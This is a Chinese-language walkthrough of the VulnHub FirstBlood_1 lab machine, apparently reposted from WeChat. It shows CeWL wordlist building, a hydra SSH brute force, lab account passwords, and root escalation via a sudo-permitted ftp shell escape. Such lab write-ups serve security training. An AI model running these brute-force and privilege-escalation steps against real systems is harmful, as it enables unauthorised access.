下载地址:https://download.vulnhub.com/firstblood/FirstBlood.ova.tar.gz
攻击者IP:192.168.56.132 桥接(自动) vmare
受害者IP:192.168.56.157 仅主机 vxbox
端口扫描,60022为ssh端口
提示查看源代码
hat you're seeing here is an HTML comment. It's not visible on the page but you can see it when you view the source. While I've got your attention, you should check out: /rambo.html
提示查看rambo.html
提示扫描目录
目录扫描
提升了find的使用方法
找到一个新目录/johnnyrambo/
提示了cewl工具
这个页面可能带有用户名和密码之类的
cewl -w words.txt -d 1 -m 5 http://192.168.56.157/johnnyrambo
cewl:调用 CeWL 工具。
-w words.txt:将抓取到的单词输出到 words.txt 文件中。
-d 1:定义抓取的深度为 1,这意味着工具只会抓取指定 URL 的页面,而不会递归抓取此页面上链接的其他页面。
-m 5:指定单词的最小长度为 5,只有长度大于或等于5的单词会被包括在生成的字典中。
http://192.168.86.132/johnnyrambo:这是目标 URL,表示 CeWL 将在这个网页上抓取符合条件的单词。
爆破johnny
http://192.168.56.157/johnnyrambo/ssh.html
成功获得用户密码
johnny/Vietnam
hydra -l johnny -P words.txt -v 192.168.56.157 ssh -s 60022 -t 4
-l johnny:指定要使用的用户名为 johnny,针对该用户进行破解尝试。
-P words.txt:指定密码列表文件 words.txt,这意味着工具会从该文件中读取密码,尝试对 SSH 服务进行登录。
-v:启用详细模式,显示运行过程中的详细信息和尝试的每一个用户名和密码组合。
-s 60022:指定 SSH 服务监听的端口号为 60022,这用于非标准端口的 SSH 服务。
-t 4:设置并行线程数为 4,表示工具会同时进行 4 个并行连接,试图加快破解速度。
192.168.56.157 ssh:192.168.56.157 是目标主机的 IP 地址,ssh 指定破解用于 SSH 协议。
ssh -p 60022 [email protected]
连接后可以sudo -l
/usr/bin/esudo-properties
找到web的默认目录
干得好!你行驶得很好!当我们发现自己在一个web服务器上时,我们想要检查web目录。以防你还没搞清楚,这个服务器运行的是Nginx。对于这个特殊的设置,我保留了默认设置。如果我们查看配置文件,我们可以查看web目录的位置:cat/etc/nginx/sites-启用/默认输出中的噪声有点大。我们可以用下面的方法来清理它:cat/etc/nginx/sites-enabled/default | grep-v " # "-v是一个反向匹配,基本上会删除所有的注释(#)行。当我们清理它时,以“root”开头的行指向web目录。移动到web目录,看看是否有要读取的文件...
find / -type f -readable 2>/dev/null | grep README.txt
cat /opt/README.txt
找到blood的用户名密码
blood/HackThePlanet2020!!
发现可以查看sly的文件
(sly) /bin/cat /home/sly/README.txt
sudo -u sly /bin/cat /home/sly/README.txt
-u指定用户,默认是root
sly/SylvesterStalone
使用ftp提权
sudo /usr/bin/ftp
!/bin/sh获得root权限
我希望你喜欢这个盒子。我想创造一些更简单的东西,因为我知道这个过程有多令人沮丧和回报。如果你喜欢这个盒子,请在Twitter上联系我,让我知道:
原文始发于微信公众号(王之暴龙战神):FirstBlood_1
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论